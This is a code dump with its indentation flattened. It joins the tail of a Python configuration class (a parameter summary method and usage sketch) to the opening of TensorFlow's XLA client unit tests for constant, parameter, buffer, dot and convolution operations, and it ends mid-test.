logger.addHandler(handler)
return logger
def summary(self):
line = 'Parameter values are as follows:'
line += '\nGamma = ' + str(self.GAMMA)
line += '\nSensitivity = ' + str(self.SENSITIVITY)
line += '\nEnsemble Size = ' + str(self.ENSEMBLE_SIZE)
line += '\nConfidence Threshold (NOT USED) = ' + str(self.CONFTHRESHOLD)
line += '\nConfidence Cutoff = ' + str(self.CONFCUTOFF)
line += '\nMax Window Size = ' + str(self.MAX_WINDOW_SIZE)
line += '\nInitial Training Size = ' + str(self.INITIAL_DATA_SIZE)
line += '\nMaximum Num Variables = ' + str(self.MAXVAR)
line += '\nOutput File = ' + str(self.OUTFILENAME)
return line
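if __name__ == '__main__':
    # Minimal usage sketch. Assumptions: a key=value file with the keys read in
    # __init__ (gamma, cushion, sensitivity, maxWindowSize, ensemble_size,
    # confthreshold, confcutoff, initialDataSize, output_file_name, tempDir,
    # logfile, baseDir, srcfileAppend, trgfileAppend) exists at this path, and
    # change_point.jar is available for the background Java process.
    props = Properties('config.properties', 'sample_dataset')
    props.logger.info(props.summary())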
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
bfloat16 = xla_client.bfloat16
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
    # [[4]]. We'd like to be stricter, so we assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationHashTest(absltest.TestCase):
def testHash(self):
builder0 = xla_client.ComputationBuilder("computation0")
p0 = builder0.ParameterFromNumpy(np.float32(0))
p1 = builder0.ParameterFromNumpy(np.zeros((4,), np.float32))
builder0.Mul(p0, p1)
computation0 = builder0.Build()
builder1 = xla_client.ComputationBuilder("computation1")
p0 = builder1.ParameterFromNumpy(np.float32(0))
p1 = builder1.ParameterFromNumpy(np.zeros((4,), np.float32))
builder1.Mul(p0, p1)
computation1 = builder1.Build()
self.assertEqual(computation0.Hash(), computation1.Hash())
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumBF16(self):
c = self._NewComputation()
c.Add(c.Constant(bfloat16(1.11)), c.Constant(bfloat16(3.14)))
self._ExecuteAndCompareClose(c, expected=bfloat16(4.25))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
btup = xla_client.Buffer.make_tuple([b0, b1], device=device)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
